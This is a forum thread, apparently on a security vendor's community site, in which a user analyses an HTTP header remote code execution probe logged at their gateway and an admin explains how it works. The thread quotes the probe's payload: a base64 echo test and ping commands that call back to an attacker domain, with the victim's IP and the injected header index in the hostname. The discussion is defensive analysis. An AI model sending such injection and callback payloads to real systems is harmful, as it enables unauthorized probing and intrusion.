Create a Post
cancel
Showing results for 
Search instead for 
Did you mean: 
Advisor

http header remote code execution - help me learn

Hi everyone,

 

I hope someone cares to learn me what was tried in this http header remote code execution and that others also can learn from this analyze. 

Here is an example of the log:

image.png

The blurred info in the following image contains the external IP of my gateway:

image.png

 

Here is the capture opened in Wireshark: Notice that all the blurred fields contain the same external IP-address as above

image.png

So this is what I understand. 

echo aaaaaaaaaaa | base64   results to encoding the text aaa... to base64 which gives the result YWFhYWFhYWFhYWEK

So all these tests will result to these:

ping YWFhYWFhYWFhYWEK-inject1-(my external IP).01h4x.com

ping YWFhYWFhYWFhYWEK-inject2-(my external IP).01h4x.com

ping YWFhYWFhYWFhYWEK-inject3-(my external IP).01h4x.com

ping YWFhYWFhYWFhYWEK-inject4-(my external IP).01h4x.com

 

Since they use inject1, inject2, inject3 and inject4, does it mean they are trying to see which http header field it's possible to inject to? Meaning inject1 will mean it worked by using Cookie field? 

But maybe more important that they managed to run the code "echo aaaaaaaaaa | base64" on the system as a test for further/later attacks? And also by including the external IP-address that they know which servers on the Internet is vulnerable and pinging back to the domain 01h4x.com?

 

Maybe I'm tottaly wrong but I hope someone cares to explain. 

 

 

0 Kudos
Reply
2 Replies
Admin
Admin

Yes, they are trying to see which field they can inject arbitrary code into, with the different hostnames and pings resulting in an activity they can track.
I imagine they could log both the DNS lookup (something unique, so it would definitely go back to their name servers and not be cached) and the actual ping to determine the level of success (a potential exhilaration channel), and of course the IP.
And yes, if this code executes at all, that is an issue.

Advisor

Thanks @PhoneBoy for confirming this. That's pretty clever of them I would say. I searched for the code online and found this website

image.png

Does it mean that the website dys-coaching.com was vulnerable for this specific attack? It's weird seeing it there as part of the website. In our case they used GET method. 

Edit1: I guess that it was only cached on the website, since HTTP GET method can be cached on the server side. At least they tried on this webiste too. 

 

0 Kudos
Reply